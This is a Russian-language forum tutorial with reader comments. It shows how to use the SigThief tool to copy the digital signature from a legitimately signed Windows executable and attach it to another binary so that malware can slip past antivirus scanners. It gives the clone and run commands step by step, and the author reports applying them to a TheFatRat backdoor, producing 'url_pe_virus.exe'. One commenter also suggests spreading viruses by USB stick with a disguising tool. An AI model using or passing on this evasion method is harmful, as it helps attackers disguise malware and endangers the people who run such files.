Статья Прячем свой грязный код от АнтиВирусов

ОбхАВ.png

(МЕГА-СУПЕР-КРУТО-ХАЦКЕРСКАЯ привъюшка :) )
Приветствие читателе форума, и просто гостей, которым мы рады :3
В этой статье я опишу способ использования инструмент под названием SigThief. Он разрывает подпись из файла PE, и добавляет его в другой, исправив таблицу сертификатов для подписания файла. Суть в том что эта подпись, будет пересоздана инструментом, не действительная(фальшивая), это и есть секрет скрытия файла от АВ.

Что такое, подпись PE, читай тут:


Приступим: качаем с гита, заходим в папку, и проверяем "все ли на месте":
Код:
git clone https://github.com/secretsquirrel/SigThief
cd SigThief
ls -l
Снимок экрана от 2017-09-29 20-21-56.png

Можно почитать, README, запускаем скрипт, и смотрим хелп:
Код:
python sigthief.py --help
Снимок экрана от 2017-09-29 20-24-47.png


1. Проверяем Есть ли водпись в .ехе файле(немножко пришлось повозиться чтоб найти файл с сигнатурой, с Фш выташила :) ):
Код:
python sigthief.py -i '/opt/SigThief/Ruiner.exe' -- нету подписей
python sigthief.py -i '/media/root/UUI/11/Приложения/AGF3DPrinterDriver.exe' -- есть подпись
Снимок экрана от 2017-09-29 22-44-47.png


Примечание: Можно все файлы копировать в папку и запускать напрямую(. /pruebas/+файл), и не вводить путь к файлу. Или перетаскивать файлы в консоль, как это делала я :)

2. Сохранения подписи:
Код:
python sigthief.py -i '[место_к_файлу]/[имя_файла].exe' -r
Снимок экрана от 2017-09-29 23-07-56.png


3. Использовать разорванную подпись:
Код:
python sigthief.py -s [место_к_файлу]/[имя_файла].exe_sig -t [файл_цель].exe
Снимок экрана от 2017-09-29 23-22-43.png


4.Удалять подпись:
Действительно интересные результаты, может помочь вам найти AVs, которые ценят подписи больше чем функциона кода
Код:
python sigthief.py -i [место_к_файлу]/[имя_файла].exe -T


5. Создания файла с чужой подписью:
Код:
python sigthief.py -i '/opt/SigThief/url_pe.exe' -t '/opt/SigThief/Ruiner.exe' -o /tmp/url_pe_virus.exe

Очень важно! Сохранять только в /tmp/

Использовала бекдор от TheFatRat, сначала до апгрейда и после ( , и )

Спасибо за внимание, услышемся.

 
да-да, уже заметил и исправил...да и вообще, непонятно, что меня дернуло в .rb пихать сигнатуру))
Я вас тогда не правильно поняла! В чистом коде (тот что еще не откомпилирован в выполняемый файл (ехе) ) нельзя сменить сигнатуру. И еще: Данный метод не рекомендуется использовать в одиночку, о чем уже писали ранние.
 
Я вас тогда не правильно поняла! В чистом коде (тот что еще не откомпилирован в выполняемый файл (ехе) ) нельзя сменить сигнатуру. И еще: Данный метод не рекомендуется использовать в одиночку, о чем уже писали ранние.
да я это все у себя на виртуалке кручу просто)
 
Мат запрещен на codeby
*** опять линукс. что-то на винде бы показали
 
Последнее редактирование модератором:
*** опять линукс. что-то на винде бы показали
По винде полно информации на Ютюбе. Там же обзоры на программы. Только вот при скачивании получаешь, как правило, что-то ещё в придачу. ;)
Советую присоединяться к секте поклонников пингвина (ну или попугая).
 
  • Нравится
Реакции: nikos
Не поймУ, как можно сигнатуру с чужого софта впилить в свой если там как минимум по чексумме идет сверка?
 
Уменьшить вероятность обнаружения. Почитай как действуют антивирусы, поймешь.
Ну подписал сертом, паленые сигнатуры остались, эвристика по поведению так же отрабатывает, какие именно защиты обходит такой метод подмены сертификата и каким образом?

Пока только флуд и отсутствие компетенции наблюдаю в топике. Я уже задал вопрос в первом своем посте, поэтому не вижу смысла дискуссии с человеком, который даже близко не представляет себе ответ. Данный софт бесполезен в качестве обхода АВ.
 
Ну подписал сертом, паленые сигнатуры остались, эвристика по поведению так же отрабатывает, какие именно защиты обходит такой метод подмены сертификата и каким образом?

Пока только флуд и отсутствие компетенции наблюдаю в топике. Я уже задал вопрос в первом своем посте, поэтому не вижу смысла дискуссии с человеком, который даже близко не представляет себе ответ. Данный софт бесполезен в качестве обхода АВ.
Тебя не озадачило то что люди с опытом и неким статусом говорят об обратном? И то что они пишут статьи и делают софт под это, должно было ставить под сомнение твою "компетентость".
 
лучше вирусы передавать через флешку и если уж так то воспользоваться маскировщиком специальным замаскирует от любого антивируса
 
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!